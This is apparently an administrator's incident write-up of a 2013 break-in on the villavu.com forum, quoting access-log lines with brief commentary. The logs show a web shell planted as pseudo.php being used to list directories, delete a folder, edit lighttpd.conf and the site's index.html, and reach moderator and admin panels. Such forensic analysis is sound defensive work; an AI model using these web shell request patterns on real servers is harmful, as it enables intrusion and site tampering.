91.236.116.109 villavu.com - [05/Jul/2013:20:45:47 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Followed by lots of actions on forum/ajax.php; I have not yet figured out what he has was doing there.

..
91.236.116.109 villavu.com - [05/Jul/2013:22:13:35 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=1383" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:13:51 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=19" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:05 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=45543" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:25 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=5" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Finally, he seems to remove some traces:

91.236.116.109 villavu.com - [05/Jul/2013:22:14:30 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/ HTTP/1.1" 200 195414 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&rmdir=/var/www/localhost/htdocs/forum/vbsso/logs/tmp" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:30 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:31 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:14:31 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:10 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/modcp/forum.php?do=modify" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:48 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:48 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 246507 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:48 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:15:48 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:16:02 +0200] "GET /forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/vbsso/logs/ HTTP/1.1" 200 14191 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:16:02 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:16:02 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Now comes a more interesting part; he tries(?) to edit the /etc/lighttpd/lighttpd.conf file. Followed by a restart of the lighttpd server; apparently by a user with ID=0. (root?)

1.236.116.109 villavu.com - [05/Jul/2013:22:24:07 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/ HTTP/1.1" 200 28154 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:07 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:07 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:07 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:09 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:09 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/ HTTP/1.1" 200 127972 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:10 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:10 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:12 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/ HTTP/1.1" 200 17902 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:12 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:12 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:13 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:15 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf HTTP/1.1" 200 21515 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:15 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf HTTP/1.1" 200 21515 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:15 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:15 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:24:16 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:51 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/ HTTP/1.1" 200 28154 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:51 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:52 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:52 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:55 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:25:55 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 251067 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

He edits the index.html of villavu.com:

91.236.116.109 villavu.com - [05/Jul/2013:22:26:01 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/&edit=/var/www/localhost/htdocs/index.html HTTP/1.1" 200 10603 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/&view=/var/www/localhost/htdocs/index.html" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Followed by another edit to the lighttpd.conf file. lighttpd was once again restarted.

91.236.116.109 villavu.com - [05/Jul/2013:22:27:24 +0200] "POST /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 22076 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:25 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:25 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:25 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:28 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:29 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 251067 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:29 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:32 +0200] "GET /forum/ HTTP/1.1" 303 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:32 +0200] "GET /forum/forum.php HTTP/1.1" 200 37740 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:33 +0200] "GET /forum/images/aria/misc/blog/top-highlight.png HTTP/1.1" 404 345 "http://villavu.com/forum/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:33 +0200] "POST /forum/misc.php?show=latestposts&vsacb_resnr=5 HTTP/1.1" 200 1860 "http://villavu.com/forum/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:33 +0200] "POST /forum/misc.php?show=posters&vsacb_resnr=5 HTTP/1.1" 200 434 "http://villavu.com/forum/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:33 +0200] "POST /forum/misc.php?show=hottestthreads&vsacb_resnr=5 HTTP/1.1" 200 689 "http://villavu.com/forum/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:47 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:47 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 251067 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:47 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:51 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/ HTTP/1.1" 200 28154 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:52 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:52 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:52 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:53 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/ HTTP/1.1" 200 127972 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:53 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:54 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:27:54 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:28:00 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/ HTTP/1.1" 200 17902 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:28:03 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf HTTP/1.1" 200 22020 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:28:03 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:28:03 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:28:03 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:04 +0200] "POST /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 22074 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:04 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:04 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:05 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:35 +0200] "POST /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 22048 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:35 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:36 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:36 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:30:00 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 1429 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

And finally he continues to play around a bit more:

91.236.116.109 villavu.com - [05/Jul/2013:22:40:39 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/private.php?folderid=0&pp=50&sort=date&page=2" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:40:49 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/private.php?folderid=0&pp=50&sort=date&page=4" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:41:08 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/private.php?folderid=0&pp=50&sort=date&page=6" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:43:42 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/forumdisplay.php?f=31" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:44:38 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/modcp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:44:38 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/modcp/index.php?do=head" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:48:25 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
